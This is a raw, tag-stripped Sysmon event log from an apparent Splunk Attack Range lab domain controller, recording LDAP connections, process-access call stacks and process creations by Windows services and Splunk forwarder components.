AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-639.attackrange.local51959-false10.0.1.14win-dc-639.attackrange.local389ldap 354300x8000000000000000108351Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.887{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51959-false10.0.1.14win-dc-639.attackrange.local389ldap 354300x8000000000000000108350Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.879{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51958-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000108349Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:00.879{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local51958-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 10341000x8000000000000000108348Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.998{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B571-615A-8B02-00000000FC01}8480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108347Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.998{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108346Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.998{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108345Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.998{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108344Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.998{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108343Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.998{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B571-615A-8B02-00000000FC01}8480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108342Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.998{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B571-615A-8B02-00000000FC01}8480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108341Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:01.999{58E9C193-B571-615A-8B02-00000000FC01}8480C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000108376Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.972{58E9C193-B573-615A-8D02-00000000FC01}41923288C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108375Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.670{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B573-615A-8D02-00000000FC01}4192C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108374Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.670{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108373Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.670{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108372Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.670{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108371Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.670{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108370Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.670{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B573-615A-8D02-00000000FC01}4192C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108369Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.670{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B573-615A-8D02-00000000FC01}4192C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108368Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.672{58E9C193-B573-615A-8D02-00000000FC01}4192C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108367Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.654{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DABD15B1C86F235B0D4D2EB504347455,SHA256=8B20E58D744E5E8B12B98E092E64F02859C35C7DF2E6B0D47F7F0A22E0BD0B5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083842Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:04:03.597{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=044F244B776FFD9F50E367ECAE98628C,SHA256=8A012B411F7E09FF082ECC5E170DE7FC2FE476B410B775B1753A3155D9AAF976,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108366Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.317{58E9C193-B573-615A-8C02-00000000FC01}85288536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108365Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.070{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B573-615A-8C02-00000000FC01}8528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108364Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.070{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108363Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.070{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108362Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.070{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B573-615A-8C02-00000000FC01}8528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108361Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.070{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108360Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.070{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108359Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.070{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B573-615A-8C02-00000000FC01}8528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108358Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.071{58E9C193-B573-615A-8C02-00000000FC01}8528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000108357Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:04:03.002{58E9C193-ACC9-615A-7700-00000000FC01}2976NT 